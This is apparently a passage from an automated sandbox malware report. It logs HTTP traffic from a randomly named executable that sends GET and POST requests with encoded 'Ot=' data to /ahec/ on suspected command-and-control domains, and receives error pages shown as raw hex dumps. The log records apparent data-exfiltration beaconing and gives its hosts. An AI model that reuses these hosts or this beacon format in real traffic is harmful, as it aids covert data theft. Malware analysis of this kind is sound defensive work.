48 33 5a 41 55 66 59 76 61 50 4b 54 46 59 70 30 58 46 78 67 6c 4a 6f 67 58 34 74 6f 48 51 50 77 45 5a 32 6d 4f 71 50 34 6a 4c 54 4a 6a 6e 68 37 65 50 58 4e 49 4b 47 69 73 4b 32 4b 42 4f 7a 6b 64 46 79 57 77 64 47 63 46 4f 5a 50 31 6c 42 6c 2f 6f 43 6f 67 36 34 6c 30 79 49 63 31 33 58 68 56 66 4e 2b 4f 43 31 35 71 5a 34 32 65 48 70 61 36 67 61 59 65 61 68 2f 58 2f 37 64 59
                                                                        Data Ascii: Ot=FXiEFcnYTh5TXhih/5c1LNfXgR9CEBrZicbyeP1U+djogyjMaNy45DIqNnYrHoSZtz8xFVDqZC4nUlDdke9qvVC0e3MdcgrA/DQqLu0TzbV8hi+NL/6v4GSslkDRZkCXmETLGapVWboMxkpi29DRPtCM41AB8V/gnxhVLIg1KBWug/obaJBSqUj3I5Yk6FSfTQa74KQhmIAfFVQRraU/fmn3jms1z8qXsh4INDE2wtxNjaImHJ063gad/BrFfIslIvQiAIKTr5RZV2Kfez/kMFWE0nzZY1xcAqm7gQvPWu1M6Ut4L7/ccchrikbW1a6Yeh/n8+UaxEwL6v2zMkX+je/BEDZksk9fxzebtgqQwu0nTCSQA/rgb9b/g3H9DOvCp8/TPE5AvJwTYD+temJ23EXUEh3/2iKbXxURbEIQKe2yQSkrSgzrUHOPLu8fkKwda9QBHjF2mXY/fCONbFDCUJDJimTaMoaYKA53i0UrHHJCBeI4Nkg4Ydsko2HF7C2v2RqtoIIYyf5vrXZbRFbIMVRoSI1CRgqmNJljbK36tc3ammZQ4SeWEKHfZHVn3IiYrxQY8gTTO/m5x4UJttjgGrRodzhFY4UsZBABLLFc1Xz3c6W6TpMTE1ebE4GJeTvaxp+2U6mFG71OFqcxtw+EQ62Q9pASkVI7YkVVQueLFohmCy6MowkU1ZI+dNd6ftQEpwfhIxI5bEVIpCPkyIFl+EY8GtdDO8caAPvO/zE+n4p1YTSUvtn63X5jwsgX958HWa0jtujQWZbc63a1wjtvM1wT7g+pq42y4LJbTo0wUduiljVeUQBJtX3EWuTY721bE44XJQHkTf7qcoOXc9dOr+bahwwSI+JumH/VZqOSGt+9m8v1PviooBTvC3pvvpVbIm8OJNARhEtZPHTz6IwdgGCsnwhojLoZMxAwhfNOXKvilyPVG9VwCsvpIE/VOy6AzR+B305GJNamuR/ITCzixZNUIGtavOYInoVL6M5myZxutTHw12CQmhvVgrD7hCDUctPx3a/Ok9OEjUWrcQCJznyVi9Z02rpNp27aRpdLIUS0I+CghoFCB+vq23YOK7xH3ZAUfYvaPKTFYp0XFxglJogX4toHQPwEZ2mOqP4jLTJjnh7ePXNIKGisK2KBOzkdFyWwdGcFOZP1lBl/oCog64l0yIc13XhVfN+OC15qZ42eHpa6gaYeah/X/7dY


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        8192.168.2.1049720172.67.184.73805828C:\Program Files (x86)\lYJnPbGqvAsrVBzAPcNbjhtdadsuOwdLkJkdJlTqjCthtZqXvtQtzjRONIHEsNRRIFDhSny\qNENczArVjafOgvC.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 2, 2023 18:49:17.139161110 CET508OUTGET /ahec/?Ot=IVKkGpXtV1toVTOE4YlrK/DLoA9BOULGifHJVqVOgN7K+V/6a9WE/CA4RHgfE4yJ8GdRU2XQNCMfR2HSu9NM5VP3fUQbd2z87Q==&6d=QlZl HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Host: www.poria.link
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                        Dec 2, 2023 18:49:47.750078917 CET814INHTTP/1.1 522
                                                                        Date: Sat, 02 Dec 2023 17:49:47 GMT
                                                                        Content-Type: text/plain; charset=UTF-8
                                                                        Content-Length: 15
                                                                        Connection: close
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=lZu2Mgm21%2Bd0ILinXBin5hqJfTN2nMo%2B3sHFAavAknkdd%2Bfcl4ikiNePvBOQOG4TQ2Nf6FxFL%2BDirQUVbrBNiuOTRFH4w8rkMckGV5t3RYy8lpyU7y%2BRX1sCDWj2g%2F7YTg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        X-Frame-Options: SAMEORIGIN
                                                                        Referrer-Policy: same-origin
                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                        Server: cloudflare
                                                                        CF-RAY: 82f567d66822399d-IAD
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 35 32 32
                                                                        Data Ascii: error code: 522


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        9192.168.2.104972137.140.192.89805828C:\Program Files (x86)\lYJnPbGqvAsrVBzAPcNbjhtdadsuOwdLkJkdJlTqjCthtZqXvtQtzjRONIHEsNRRIFDhSny\qNENczArVjafOgvC.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 2, 2023 18:49:53.556916952 CET795OUTPOST /ahec/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.makeinai.online
                                                                        Origin: http://www.makeinai.online
                                                                        Referer: http://www.makeinai.online/ahec/
                                                                        Cache-Control: no-cache
                                                                        Content-Length: 183
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                        Data Raw: 4f 74 3d 42 77 31 4a 49 64 62 4d 57 32 4b 6f 4a 55 4b 2b 42 65 36 4a 79 58 4f 56 50 79 43 65 39 6f 6f 68 56 4d 49 73 77 33 30 58 32 79 58 69 2f 6b 74 36 73 52 68 72 6c 50 55 2f 4d 56 78 65 59 30 67 6e 58 73 66 66 38 2b 68 72 2b 58 34 4e 65 43 32 36 52 58 2b 39 6c 6e 4f 58 59 65 43 49 41 65 56 37 75 68 6c 42 5a 2f 72 59 55 64 70 4c 63 2b 44 6f 39 31 37 48 51 4a 55 77 6d 6b 74 45 66 50 53 55 6c 53 75 4f 4c 74 37 77 70 73 50 31 39 68 32 6d 79 43 77 49 68 71 38 4a 78 49 45 69 49 57 47 76 66 4d 6b 74 72 50 2b 62 47 64 57 79 4a 7a 70 7a 37 51 3d 3d
                                                                        Data Ascii: Ot=Bw1JIdbMW2KoJUK+Be6JyXOVPyCe9oohVMIsw30X2yXi/kt6sRhrlPU/MVxeY0gnXsff8+hr+X4NeC26RX+9lnOXYeCIAeV7uhlBZ/rYUdpLc+Do917HQJUwmktEfPSUlSuOLt7wpsP19h2myCwIhq8JxIEiIWGvfMktrP+bGdWyJzpz7Q==
                                                                        Dec 2, 2023 18:49:53.784667969 CET1340INHTTP/1.1 403 Forbidden
                                                                        Server: nginx
                                                                        Date: Sat, 02 Dec 2023 17:49:53 GMT
                                                                        Content-Type: text/html
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        ETag: W/"64f9f107-377d8"
                                                                        Content-Encoding: gzip
                                                                        Data Raw: 36 30 30 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec bd ef 8e db 48 b2 2f f8 7d 9e 42 a5 83 b6 a5 31 a5 e2 7f 52 92 e9 9a 9e 1e f7 99 c6 99 9e 6e 8c fb f4 60 51 63 08 2c 89 2a b1 4d 89 ba 24 55 e5 72 b9 0e ee dd 27 d9 af fb ed ec 05 16 d8 c5 ee de 05 f6 09 e6 bc d1 46 44 92 14 ff 4a 49 51 e5 6a fb 4c 75 5b a2 c8 cc 88 cc c8 c8 c8 5f 44 06 c9 97 67 73 7f 16 dd 6d 9c ce 32 5a 79 af 5e e2 67 c7 b3 d7 d7 56 d7 59 77 e1 b7 63 cf 5f bd 5c 39 91 dd 99 2d ed 20 74 22 ab fb af 3f 7d 3b 30 e1 5a e4 46 9e f3 ea ef ff cb df ff fd ef ff db df ff c7 7f fc cf 7f ff f7 ce 7f fc 37 f8 f1 7f d2 e1 df ff fb 7f fc d7 bf ff ef 7f ff bf e1 df ff 03 ff fd 8f ce df ff 5f 38 f1 7f 40 c1 ff 86 d7 f1 d4 df ff fb df ff 2f ba fc ef 2f cf 19 b1 97 61 74 e7 39 9d 95 33 77 6d ab 6b 7b 5e f7 d5 f9 6f cf 7e fb b9 ff 9d fd f6 6f bf e9 74 b0 1f 9d 59 18 76 86 e7 6b 7f ee 4c 57 fe 7c eb 39 e1 39 9c 1a 78 be 3d 77 82 73 77 3d 77 de 0f 7f 09 2f 2e 66 9e bf 76 e6 7f 81 02 6f 9c 68 a0 0f b7 a1 73 29 bd 3d 2b 54 dd f8 61 94 a9 1e 06 b3 94 44 b1 28 fc 4b cb cd dd 30 3a 9f fd 12 b2 62 57 ce ea fc ca f3 67 ef c2 a1 3d b7 37 91 7b e3 9c 5f 0d 36 f6 75 f2 35 c4 ba 1d ec 07 f4 e2 6f 4f 2d cc d6 7f e7 bf 19 b2 7e dd 83 1c 36 9e 7d 37 5e 78 ce fb 09 7e 0c e6 6e e0 cc 22 d7 5f 8f 67 be b7 5d ad 27 b7 ee 3c 5a 8e 25 51 fc 6a b2 72 d7 03 f6 53 91 c5 cd fb c9 d2 71 af 97 11 bb b6 b1 e7 73 77 7d 3d d6 8c cd fb 8e d8 11 27 2b 3b b8 76 d7 63 71 02 74 fc 60 fc 4f 8a ae c2 ff 93 85 bf 86 1a 32 14 fa 6e 1d 39 81 f0 75 e0 da 9e f0 47 c7 bb 71 22 77 66 77 fe ec 6c 9d dd 4f e1 db c0 71 de d8 eb 50 08 e1 63 10 3a 81 bb 98 5c d9 b3 77 d7 81 bf 5d cf c7 ff b4 58 2c 26 83 5b e7 ea 9d 1b 0d 22 7b 33 58 42 8b 3c 6c d5 80 b1 8d 02 a8 b7 b1 03 67 1d 3d e0 d4 1e af fd a8 37 74 c3 69 32 d0 fd 4e 22 0b ff c6 09 16 9e 7f 3b 78 3f 5e ba f3 b9 b3 7e f8 1d 4d c3 4e 6f d7 6f 49 94 d5 cd fb fe 7d 96 c2 1e 02 0f f1 a5 29 1a 98 29 34 e3 1d 88 e8 1e c9 ed 44 77 b3 cc 97 72 82 c0 0f 18 c1 44 a6 e2 81 a6 4f 57 ce 7a 3b c0 c2 38 70 70 7d ee cc 85 e6 55 06 f6 0c cb 24 6c 07 91 bf 01 d6 cd 84 50 45 b7 40 f0 a1 61 13 24 d4 b5 13 34 a3 ba 7b 87 b4 22 57 3a 33 03 46 23 1d 5a 75 40 c8 70 c5 5d dc 0d ae 02 ff 16 54 77 7a e3 86 ee 95 97 a7 a9 a9 8d 3b 77 a0 4d 95 f2 e0 6d c9 6e 70 fc 2b d7 73 06 89 4e 4f 99 46 0b c9 e5 70 7b 85 22 9e fa 1b 07 ac 74 aa fa 89 e2 1f 90 cb 74 e1 fb 30 f9 07 73 ff 76 7d 50 51 ab 1b 72 a0 56 5d fb e2 8e 37 55 a7 43 e4 1a ab 67 65 a7 2a e8 0e dd dd b0 27 c6 9a 96 aa 87 2a 59 de a3 09 1f 4b 60 7f ed 6d e4 4f 8a a3 92 21 96 af 96 b7 48 5f 35 ed 4d 8e 56 45 1f 2a 8a 4d d3 ae 27 aa 58 aa 57 ac 06 9d a8 66 09 a6 1e 96 92 75 94 6a f3 95 1f 45 fe 0a 26 77 1d 09 f6 33 15 e8 1a 90 c6 ae 6c 4c 6d 70 1b d8 9b 0d 94 4a 16 32 92 69 6d b1 29 01 b7 29 82 8f 4c 4b 02 92 29 8a 2e 59 20 07 9e b3 60 67 f8 48 4d d7 ce 6d 81 9c 6a 16 c9 e1 99 83 73 ae d8 af 06 76 ac 49 67 c5 7c d3 1a 2f 20 7b db c9 55 a3 51 eb 1a 77 9d 16 e9 25 c0 4e 24 12 46 36 c0 94 b8 89 a6 78 c4 42 d5 98 fe 4e 6d 92 e5 2d 3b 7d 75 71 a7 1b f4 83 b0 98 07 70 77 40 52 19 20 79 a6 f0 87 3a 9e 92 4f 61 48 8a e9 3a 03 49 63 a4 1b 77 97 8f 6a b9 93 bb e9 58 00 a1 3b 3a 3b 5c 18 83 bf 7f 5a c8 0b 75 31 e2 ee 69 05 0f a6 76 c7 76 b2 96 60 45 ff c8 ff 03 03
                                                                        Data Ascii: 6000H/}B1Rn`Qc,*M$Ur'FDJIQjLu[_Dgsm2Zy^gVYwc_\9- t"?};0ZF7_8@//at93wmk{^o~otYvkLW|99x=wsw=w/.fvohs)=+TaD(K0:bWg=7{_6u5oO-~6}7^x~n"_g]'<Z%QjrSqsw}='+;vcqt`O2n9uGq"wfwlOqPc:\w]X,&["{3XB<lg=7ti2N";x?^~MNooI}))4DwrDOWz;8pp}U$lPE@a$4{"W:3F#Zu@p]Twz;wMmnp+sNOFp{"tt0sv}PQrV]7UCge*'*YK`mO!H_5MVE*M'XWfujE&w3lLmpJ2im))LK).Y `gHMmjsvIg|/ {UQw%N$F6xBNm-;}uqpw@R y:OaH:IcwjX;:;\Zu1ivv`E
                                                                        Dec 2, 2023 18:49:53.784688950 CET1340INData Raw: ee db d1 18 75 93 21 65 43 14 3b d8 cd 73 45 6c 03 99 3d 77 ed 24 2a a2 99 59 db 93 e7 3f 80 82 ef ee 23 e7 7d 34 98 3b 33 3f b0 c9 13 c8 db c7 8a 1a e3 25 5a ef 52 3d 18 09 27 40 d6 75 95 51 62 ac df 89 29 76 d7 35 e5 dd c8 59 dd 83 b7 47 bf c6
                                                                        Data Ascii: u!eC;sEl=w$*Y?#}4;3?%ZR='@uQb)v5YG(I~.';<N6Nz$*jvn^_aVa5Nmz]R0T=j0d9v0E|9-Eq=%l)MF1qax
                                                                        Dec 2, 2023 18:49:53.785108089 CET1340INData Raw: 83 53 15 67 c3 f2 c9 d2 89 2b ff 3d ce 61 5c 32 52 13 f6 be 18 25 f3 37 91 bb 82 59 fd 27 70 41 ae 5c cf 8d ee 1e 52 79 0b e9 d1 98 65 fd 65 4e c4 7b d5 18 81 63 6b c7 50 96 c3 8e 63 87 ce c0 5d 0f fc 6d b4 23 73 09 c3 63 83 1f 31 7f bb ab 3f c5
                                                                        Data Ascii: Sg+=a\2R%7Y'pA\RyeeN{ckPc]m#sc1?g\I6KzQqCua'c'{23^bx%)orLBPIzIDVdB(^ -.,#4~>#FU!e%_RM@&D=~^5tW^b{%QV68o}
                                                                        Dec 2, 2023 18:49:53.785171986 CET1340INData Raw: ad 53 c1 60 6e 1e 8f 19 da 7d 2c 49 f1 02 dd 83 d5 0f c0 db 83 f5 0f 80 da cc 0d 3c ec 19 33 9b c0 5d d9 c1 dd 7d f9 bd 09 a2 38 13 4d b5 ae 42 56 82 f8 28 04 7a 5a 80 50 53 38 7e 96 40 15 8f b9 3d d2 eb 78 c4 8f 28 a8 ac 67 1b 86 5c 57 6f b0 76
                                                                        Data Ascii: S`n},I<3]}8MBV(zZPS8~@=x(g\WovnRlw?46-T,XhlDUvU}OdVxoMm-?(^]#3,5UJ1EY!9$cE->i*MoUWeA!
                                                                        Dec 2, 2023 18:49:53.785710096 CET1340INData Raw: a0 c5 7a e9 e3 b8 f3 4d 36 5a bd 4a 2c df e4 e4 e9 ca 75 ac 0f 34 5d 2f b7 9c 1e 8a 9f 36 18 53 1f cf f5 56 2f 07 cb 37 38 79 c6 78 81 e3 81 76 8e ca dd bc 72 af 85 32 9d b2 c8 a9 07 da 09 b5 24 79 a6 70 be 2d 15 1d d8 d3 bc 03 dd ad 10 12 3e 48
                                                                        Data Ascii: zM6ZJ,u4]/6SV/78yxvr2$yp->H?r%G\U'T_dR!VIV0kgWsYe,BNP m\zAC9g3<_ms+E}&w3bY!Tb
                                                                        Dec 2, 2023 18:49:53.785924911 CET1340INData Raw: 8e 4f b6 88 a4 cf bc 7d 88 f9 c6 5f 87 1e 99 87 45 76 2e 60 6c 56 4e ed 5b 9b d5 dc b2 cf 73 cb 37 55 28 17 de df 9f 03 1c 32 fd 3a a5 5b 5d e6 ba 7b 34 ed c9 1d dd f4 41 b8 39 66 bc 32 4c 9e 60 5b 2f c2 fd f4 33 9d 3a a5 8f 5b 66 9a 3e 45 f6 e4
                                                                        Data Ascii: O}_Ev.`lVN[s7U(2:[]{4A9f2L`[/3:[f>E*W_z)2fO3s`\z'Vk'wOG)>3[`+e,U=Tfy]lNhs\3<((5a
                                                                        Dec 2, 2023 18:49:53.786299944 CET1340INData Raw: 86 9a a6 75 c4 81 6e 0e 14 71 a8 aa 2a 1e e9 66 48 3f 34 38 ea d0 ef 19 15 84 da f0 b3 c3 0a 76 e8 5a 38 48 7f b1 c2 1f 9e 9f b3 be ce dc 60 e6 39 e5 de ce de 5b cf 59 5b e0 f8 2e 3e 36 9e 77 02 eb b9 2e 0d 65 51 4e 08 e4 85 f5 ed b7 df 32 49 8d
                                                                        Data Ascii: unq*fH?48vZ8H`9[Y[.>6w.eQN2I('eh<gMJks(*@2#?;O!9%|*JDj+( Pe:Gz%XT+$IUWT?Pp*#X?|oC;645g*Aq
                                                                        Dec 2, 2023 18:49:53.786324978 CET1340INData Raw: 8b 03 75 c1 08 13 5c d7 b1 77 20 59 b4 33 e2 c8 08 61 89 c0 a5 43 03 eb 05 67 74 5a b9 0c 05 9d 26 13 87 0a 5d 0a c3 40 c7 40 87 d1 95 d0 62 ca 60 83 35 e8 0d ac 9f b0 1c c3 a7 6c a0 af 23 2b e8 8a 28 84 2f 68 71 90 45 30 7f b0 1e 82 d4 c0 a2 c1
                                                                        Data Ascii: u\w Y3aCgtZ&]@@b`5l#+(/hqE0?4,^pl_`4UV/6y+5s'dp#jZB3`/C~92u02s2p"T5iP+0Awd_FudDRZ4i&p<$bPE{ |
                                                                        Dec 2, 2023 18:49:53.786823988 CET1340INData Raw: 67 a9 84 fe 61 a5 ea 60 f4 d0 29 1e 61 84 09 b7 51 60 8a ea 36 4e 0c 59 eb c4 5f 24 08 05 1d 26 84 4d b2 e9 01 30 20 ef 55 c3 d0 12 46 09 75 09 e3 63 d4 4b 99 42 82 06 6d 3a 89 60 bf d0 01 42 b9 23 1c c3 58 fb 60 48 3f 45 d4 46 2c ae e0 74 05 8d
                                                                        Data Ascii: ga`)aQ`6NY_$&M0 UFucKBm:`B#X`H?EF,t6F:#FNeh9u-&$"m_=QPE<BA(B@9TGr}o8ZqZ1p}3"4\hR!&RAdf0m L^(WGn`74]@H<a
                                                                        Dec 2, 2023 18:49:53.786895037 CET1340INData Raw: 8d d5 5a 2a d2 8d 64 2c 07 8a f4 a1 7a 13 53 14 bf 36 46 7f 88 4d 3a e6 dc 76 24 dc 99 c7 cd 20 5d c1 94 3b 53 5d d2 76 7f 4d fd 74 13 d4 c4 54 0f 1d e3 8b 7f 84 5a 8a 6e ab 2a 6d 6d c5 5f b4 95 81 d9 19 18 94 9d 89 14 18 67 3b 31 22 6e 9c 9a 94
                                                                        Data Ascii: Z*d,zS6FM:v$ ];S]vMtTZn*mm_g;1"no5,esn$f@Sbjq6I!8P4`7:}d&li_YQBk0Kg(h51nU<})MS:&G
                                                                        Dec 2, 2023 18:49:54.004050016 CET1340INData Raw: fe 56 51 ca b7 c3 e0 ed 84 72 27 9e 76 26 0a 19 d3 b6 4c cd a0 4f f3 6b 95 ee b5 60 9f 98 01 06 33 73 04 eb 84 3e d4 fe 88 93 01 6f e8 10 55 98 bc a6 22 79 54 a3 43 9f 76 b1 1e bb 06 96 c4 94 59 e9 1b bc 2f 5c a1 29 a7 fe 0c c7 ba 61 d8 0a dd 54
                                                                        Data Ascii: VQr'v&LOk`3s>oU"yTCvY/\)aT><M8d(}u3 ?(DUa7g'yC@*}4_}WKB~|lR)s1%rbEA/O34Pksj6fVIo


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        10192.168.2.104972237.140.192.89805828C:\Program Files (x86)\lYJnPbGqvAsrVBzAPcNbjhtdadsuOwdLkJkdJlTqjCthtZqXvtQtzjRONIHEsNRRIFDhSny\qNENczArVjafOgvC.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 2, 2023 18:49:56.308264971 CET815OUTPOST /ahec/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.makeinai.online
                                                                        Origin: http://www.makeinai.online
                                                                        Referer: http://www.makeinai.online/ahec/
                                                                        Cache-Control: no-cache
                                                                        Content-Length: 203
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                        Data Raw: 4f 74 3d 42 77 31 4a 49 64 62 4d 57 32 4b 6f 50 33 53 2b 4e 5a 6d 4a 30 33 4f 57 44 53 43 65 7a 49 6f 6c 56 4d 45 73 77 31 59 48 32 41 7a 69 2f 46 64 36 76 54 4a 72 67 50 55 2f 55 6c 77 57 46 45 67 38 58 73 69 69 38 37 5a 72 2b 55 45 4e 65 48 79 36 51 6b 47 69 6b 33 4f 56 51 2b 43 4f 66 75 56 37 75 68 6c 42 5a 37 44 79 55 64 78 4c 63 50 54 6f 38 55 37 45 64 70 55 7a 6e 6b 74 45 55 76 54 38 6c 53 76 72 4c 6f 65 56 70 71 54 31 39 6c 36 6d 78 54 77 4a 75 71 38 4c 75 59 45 73 46 6a 7a 32 61 73 52 57 76 2b 6e 66 62 5a 76 5a 42 47 46 67 38 69 39 50 34 32 43 45 65 44 47 75 41 2b 63 65 47 51 73 78 65 67 38 3d
                                                                        Data Ascii: Ot=Bw1JIdbMW2KoP3S+NZmJ03OWDSCezIolVMEsw1YH2Azi/Fd6vTJrgPU/UlwWFEg8Xsii87Zr+UENeHy6QkGik3OVQ+COfuV7uhlBZ7DyUdxLcPTo8U7EdpUznktEUvT8lSvrLoeVpqT19l6mxTwJuq8LuYEsFjz2asRWv+nfbZvZBGFg8i9P42CEeDGuA+ceGQsxeg8=
                                                                        Dec 2, 2023 18:49:56.536603928 CET1340INHTTP/1.1 403 Forbidden
                                                                        Server: nginx
                                                                        Date: Sat, 02 Dec 2023 17:49:56 GMT
                                                                        Content-Type: text/html
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        ETag: W/"64f9f107-377d8"
                                                                        Content-Encoding: gzip
                                                                        Data Raw: 36 30 30 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec bd ef 8e db 48 b2 2f f8 7d 9e 42 a5 83 b6 a5 31 a5 e2 7f 52 92 e9 9a 9e 1e f7 99 c6 99 9e 6e 8c fb f4 60 51 63 08 2c 89 2a b1 4d 89 ba 24 55 e5 72 b9 0e ee dd 27 d9 af fb ed ec 05 16 d8 c5 ee de 05 f6 09 e6 bc d1 46 44 92 14 ff 4a 49 51 e5 6a fb 4c 75 5b a2 c8 cc 88 cc c8 c8 c8 5f 44 06 c9 97 67 73 7f 16 dd 6d 9c ce 32 5a 79 af 5e e2 67 c7 b3 d7 d7 56 d7 59 77 e1 b7 63 cf 5f bd 5c 39 91 dd 99 2d ed 20 74 22 ab fb af 3f 7d 3b 30 e1 5a e4 46 9e f3 ea ef ff cb df ff fd ef ff db df ff c7 7f fc cf 7f ff f7 ce 7f fc 37 f8 f1 7f d2 e1 df ff fb 7f fc d7 bf ff ef 7f ff bf e1 df ff 03 ff fd 8f ce df ff 5f 38 f1 7f 40 c1 ff 86 d7 f1 d4 df ff fb df ff 2f ba fc ef 2f cf 19 b1 97 61 74 e7 39 9d 95 33 77 6d ab 6b 7b 5e f7 d5 f9 6f cf 7e fb b9 ff 9d fd f6 6f bf e9 74 b0 1f 9d 59 18 76 86 e7 6b 7f ee 4c 57 fe 7c eb 39 e1 39 9c 1a 78 be 3d 77 82 73 77 3d 77 de 0f 7f 09 2f 2e 66 9e bf 76 e6 7f 81 02 6f 9c 68 a0 0f b7 a1 73 29 bd 3d 2b 54 dd f8 61 94 a9 1e 06 b3 94 44 b1 28 fc 4b cb cd dd 30 3a 9f fd 12 b2 62 57 ce ea fc ca f3 67 ef c2 a1 3d b7 37 91 7b e3 9c 5f 0d 36 f6 75 f2 35 c4 ba 1d ec 07 f4 e2 6f 4f 2d cc d6 7f e7 bf 19 b2 7e dd 83 1c 36 9e 7d 37 5e 78 ce fb 09 7e 0c e6 6e e0 cc 22 d7 5f 8f 67 be b7 5d ad 27 b7 ee 3c 5a 8e 25 51 fc 6a b2 72 d7 03 f6 53 91 c5 cd fb c9 d2 71 af 97 11 bb b6 b1 e7 73 77 7d 3d d6 8c cd fb 8e d8 11 27 2b 3b b8 76 d7 63 71 02 74 fc 60 fc 4f 8a ae c2 ff 93 85 bf 86 1a 32 14 fa 6e 1d 39 81 f0 75 e0 da 9e f0 47 c7 bb 71 22 77 66 77 fe ec 6c 9d dd 4f e1 db c0 71 de d8 eb 50 08 e1 63 10 3a 81 bb 98 5c d9 b3 77 d7 81 bf 5d cf c7 ff b4 58 2c 26 83 5b e7 ea 9d 1b 0d 22 7b 33 58 42 8b 3c 6c d5 80 b1 8d 02 a8 b7 b1 03 67 1d 3d e0 d4 1e af fd a8 37 74 c3 69 32 d0 fd 4e 22 0b ff c6 09 16 9e 7f 3b 78 3f 5e ba f3 b9 b3 7e f8 1d 4d c3 4e 6f d7 6f 49 94 d5 cd fb fe 7d 96 c2 1e 02 0f f1 a5 29 1a 98 29 34 e3 1d 88 e8 1e c9 ed 44 77 b3 cc 97 72 82 c0 0f 18 c1 44 a6 e2 81 a6 4f 57 ce 7a 3b c0 c2 38 70 70 7d ee cc 85 e6 55 06 f6 0c cb 24 6c 07 91 bf 01 d6 cd 84 50 45 b7 40 f0 a1 61 13 24 d4 b5 13 34 a3 ba 7b 87 b4 22 57 3a 33 03 46 23 1d 5a 75 40 c8 70 c5 5d dc 0d ae 02 ff 16 54 77 7a e3 86 ee 95 97 a7 a9 a9 8d 3b 77 a0 4d 95 f2 e0 6d c9 6e 70 fc 2b d7 73 06 89 4e 4f 99 46 0b c9 e5 70 7b 85 22 9e fa 1b 07 ac 74 aa fa 89 e2 1f 90 cb 74 e1 fb 30 f9 07 73 ff 76 7d 50 51 ab 1b 72 a0 56 5d fb e2 8e 37 55 a7 43 e4 1a ab 67 65 a7 2a e8 0e dd dd b0 27 c6 9a 96 aa 87 2a 59 de a3 09 1f 4b 60 7f ed 6d e4 4f 8a a3 92 21 96 af 96 b7 48 5f 35 ed 4d 8e 56 45 1f 2a 8a 4d d3 ae 27 aa 58 aa 57 ac 06 9d a8 66 09 a6 1e 96 92 75 94 6a f3 95 1f 45 fe 0a 26 77 1d 09 f6 33 15 e8 1a 90 c6 ae 6c 4c 6d 70 1b d8 9b 0d 94 4a 16 32 92 69 6d b1 29 01 b7 29 82 8f 4c 4b 02 92 29 8a 2e 59 20 07 9e b3 60 67 f8 48 4d d7 ce 6d 81 9c 6a 16 c9 e1 99 83 73 ae d8 af 06 76 ac 49 67 c5 7c d3 1a 2f 20 7b db c9 55 a3 51 eb 1a 77 9d 16 e9 25 c0 4e 24 12 46 36 c0 94 b8 89 a6 78 c4 42 d5 98 fe 4e 6d 92 e5 2d 3b 7d 75 71 a7 1b f4 83 b0 98 07 70 77 40 52 19 20 79 a6 f0 87 3a 9e 92 4f 61 48 8a e9 3a 03 49 63 a4 1b 77 97 8f 6a b9 93 bb e9 58 00 a1 3b 3a 3b 5c 18 83 bf 7f 5a c8 0b 75 31 e2 ee 69 05 0f a6 76 c7 76 b2 96 60 45 ff c8 ff 03 03
                                                                        Data Ascii: 6000H/}B1Rn`Qc,*M$Ur'FDJIQjLu[_Dgsm2Zy^gVYwc_\9- t"?};0ZF7_8@//at93wmk{^o~otYvkLW|99x=wsw=w/.fvohs)=+TaD(K0:bWg=7{_6u5oO-~6}7^x~n"_g]'<Z%QjrSqsw}='+;vcqt`O2n9uGq"wfwlOqPc:\w]X,&["{3XB<lg=7ti2N";x?^~MNooI}))4DwrDOWz;8pp}U$lPE@a$4{"W:3F#Zu@p]Twz;wMmnp+sNOFp{"tt0sv}PQrV]7UCge*'*YK`mO!H_5MVE*M'XWfujE&w3lLmpJ2im))LK).Y `gHMmjsvIg|/ {UQw%N$F6xBNm-;}uqpw@R y:OaH:IcwjX;:;\Zu1ivv`E
                                                                        Dec 2, 2023 18:49:56.536626101 CET1340INData Raw: ee db d1 18 75 93 21 65 43 14 3b d8 cd 73 45 6c 03 99 3d 77 ed 24 2a a2 99 59 db 93 e7 3f 80 82 ef ee 23 e7 7d 34 98 3b 33 3f b0 c9 13 c8 db c7 8a 1a e3 25 5a ef 52 3d 18 09 27 40 d6 75 95 51 62 ac df 89 29 76 d7 35 e5 dd c8 59 dd 83 b7 47 bf c6
